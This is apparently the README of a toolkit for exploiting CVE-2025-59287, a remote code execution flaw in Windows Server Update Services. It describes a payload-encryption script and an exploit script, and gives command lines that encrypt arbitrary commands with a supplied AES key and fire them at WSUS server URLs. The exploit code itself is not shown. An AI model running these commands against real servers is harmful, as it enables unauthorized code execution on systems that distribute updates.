Introduction
CVE-2025-59287 - WSUS Exploitation Toolkit
by adel-h4x0a
⚠️ For Educational and Authorized Testing Purposes Only ⚠️
Overview
This toolkit demonstrates the exploitation of CVE-2025-59287, a remote code execution vulnerability in Windows Server Update Services (WSUS).
Components
1. Encryption Module (cve-2025-59287-encr.py)
· AES payload encryption for WSUS communication
· Support for both legacy and secure encryption modes
· Custom payload generation
2. Exploitation Module (cve-2025-59287-exp.py)
· Full exploitation chain for CVE-2025-59287
· Robust error handling and retry logic
· Custom payload support
Structure
```
📁 CVE-2025-59287-WSUS-Exploit/
├── 📄 cve-2025-59287-encr.py # Encryption module
├── 📄 cve-2025-59287-exp.py # Exploitation module
├── 📄 requirements.txt # Dependencies
└── 📄 README.md # This file
```
Usage
Prerequisites
```bash
pip install -r requirements.txt
```
Encryption
```bash
# Basic encryption
python cve-2025-59287-encr.py --command "calc" --mode legacy
# Encryption with custom key
python cve-2025-59287-encr.py --key "877C14E433638145AD21BD0C17393071" --command "whoami"
# Save output to file
python cve-2025-59287-encr.py --command "ipconfig" --output payload.txt
```
Exploitation
```bash
# Basic exploitation
python cve-2025-59287-exp.py http://wsus-server:8530
# With custom payload
python cve-2025-59287-exp.py http://192.168.1.100:8530 --payload custom_payload.txt
# With advanced settings
python cve-2025-59287-exp.py http://wsus-server:8530 --timeout 60 --retries 5
```
Options
Encryption Module (cve-2025-59287-encr.py)
· --key: AES key in hex format (optional)
· --command: Command to execute (default: calc)
· --mode: Encryption mode [`legacy`, `secure`] (default: legacy)
· --output: Output file to save payload (optional)
Exploitation Module (cve-2025-59287-exp.py)
· target: WSUS server URL (required)
· --payload: Custom base64 payload file (optional)
· --timeout: Request timeout in seconds (default: 30)
· --retries: Number of retry attempts (default: 3)
· --no-banner: Suppress banner display (optional)
Complete Example
```bash
# Generate custom payload
python cve-2025-59287-encr.py --command "whoami /all" --output custom_payload.txt
# Execute exploitation
python cve-2025-59287-exp.py http://wsus.internal.com:8530 --payload custom_payload.txt
```
Legal Disclaimer
❗ Important Warning:
This tool is provided for educational purposes and authorized penetration testing only. Unauthorized use against systems you do not own or have explicit permission to test is illegal.
This tool should only be used in:
· Testing environments that you own
· Systems for which you have obtained written permission to test
· Educational and academic purposes
The developer is not responsible for any illegal or unauthorized use of this tool.
License
This project is licensed under the MIT License.
Updates
· v1.0: Initial release with full exploitation support
· v1.1: Enhanced error handling and logging improvements
Contributing
Bug reports and pull requests that improve the tool are welcome, within the bounds of responsible and ethical use.
---
Note: Always obtain written permission before testing any system. Security awareness begins with responsibility. 🔒
File Snapshot
[4.0K] /data/pocs/9718854828323819c7f1063a33e71357f90ca66f
├── [8.6K] cve-2025-59287-encr.py
├── [ 18K] cve-2025-59287-exp.py
├── [3.3K] README.md
└── [ 53] requirements.txt
1 directory, 4 files